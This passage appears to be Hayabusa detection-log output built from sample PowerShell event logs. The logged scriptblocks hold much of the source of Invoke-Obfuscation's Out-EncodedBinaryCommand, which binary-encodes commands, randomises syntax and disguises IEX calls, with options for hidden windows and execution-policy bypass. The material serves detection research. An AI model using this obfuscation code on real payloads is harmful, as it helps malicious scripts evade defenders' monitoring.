Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. 